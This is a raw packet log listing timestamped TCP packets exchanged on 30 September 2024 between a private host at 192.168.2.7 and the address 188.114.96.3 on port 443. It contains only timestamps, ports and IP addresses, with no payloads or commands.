                                                                                                                                                                                                            Sep 30, 2024 18:33:30.831475973 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.831481934 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.831521988 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.831537008 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.832238913 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.832283974 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.832310915 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.832315922 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.832345009 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.832359076 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.872473001 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.872503042 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.872590065 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.872622013 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.872658014 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.920582056 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.920643091 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.920696020 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.920773029 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.920811892 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.920921087 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.921195030 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.921235085 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.921264887 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.921278954 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.921305895 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.921325922 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.922795057 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.922813892 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.922858953 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.922872066 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.922898054 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.922915936 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.923624992 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.923664093 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.923692942 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.923706055 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.923727036 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.923772097 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.924422979 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.924463987 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.924501896 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.924514055 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.924539089 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.924599886 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.925789118 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.925829887 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.925853968 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.925865889 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.925916910 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.925916910 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.926419973 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.926460981 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.926496983 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.926508904 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.926552057 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.926573038 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.965114117 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.965167999 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.965220928 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.965269089 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.965311050 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:30.965353012 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013145924 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013194084 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013257980 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013312101 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013345957 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013421059 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013791084 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013844013 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013886929 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.013891935 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.014003038 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.015448093 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.015487909 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.015861034 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.015870094 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.015913010 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.016010046 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.016072989 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.016088009 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.016094923 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.016140938 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.017162085 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.017221928 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.017265081 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.017271042 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.017316103 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019047976 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019085884 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019112110 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019121885 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019172907 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019493103 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019534111 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019556999 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019567013 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019598961 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.019612074 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.058381081 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.058439970 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.058479071 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.058499098 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.058535099 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.058546066 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.107868910 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.107916117 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108014107 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108041048 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108063936 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108093977 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108109951 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108144999 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108374119 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108412981 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108445883 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108467102 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108495951 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108925104 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108969927 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.108990908 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.109004021 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.109034061 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.109777927 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.109816074 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.109867096 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.109882116 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.109914064 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.111793995 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.111839056 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.111876011 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.111912012 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.111939907 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.112338066 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.112375975 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.112412930 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.112426996 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.112452030 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.130096912 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.150979042 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.151022911 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.151088953 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.151113033 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.151143074 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.198503017 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.199126959 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.199206114 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.199270964 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.199290037 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.199342012 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.200810909 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.200855970 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.200858116 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.200880051 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.200889111 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.200946093 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.200946093 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.201801062 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.201854944 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.201889038 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.201904058 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.201932907 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.202327967 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.202373981 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.202393055 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.202406883 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.202433109 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.202466011 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.202970028 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.203008890 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.203047037 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.203061104 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.203085899 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.204261065 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.204308033 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.204345942 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.204363108 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.204389095 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.204433918 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.205507994 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.205548048 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.205586910 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.205605030 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.205627918 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.209573030 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.211596012 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.243761063 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.243807077 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.244118929 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.244170904 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.244292974 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.293376923 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.293421030 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.293647051 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.293689013 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.293757915 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.295038939 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.295078039 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.295197010 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.295212030 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.295269012 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.295959949 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.295998096 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.296089888 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.296103001 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.296147108 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.296629906 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.296669006 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.296761990 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.296776056 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.296828032 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.298082113 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.298121929 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.298197985 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.298213005 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.298240900 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.298608065 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300041914 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300081968 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300134897 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300154924 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300177097 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300631046 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300693035 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300708055 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300738096 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300765991 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.300803900 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.315975904 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.342201948 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.342231035 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.342304945 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.342324018 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.342364073 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.342385054 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.387171984 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.387232065 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.387271881 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.387293100 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.387326956 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.387336969 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.388470888 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.388528109 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.388586044 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.388592005 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.388634920 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.389739990 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.389780998 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.389825106 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.389830112 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.389868975 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.389887094 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.390567064 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.390608072 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.390649080 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.390659094 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.390697956 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.390711069 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.391233921 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.391283035 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.391324997 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.391330004 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.391362906 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.391381025 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.397770882 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.397811890 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.397852898 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.397866964 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.397893906 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.397917032 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.398000002 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.398056030 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.398061037 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.398071051 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.398117065 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:31.398142099 CEST44349701188.114.96.3192.168.2.7
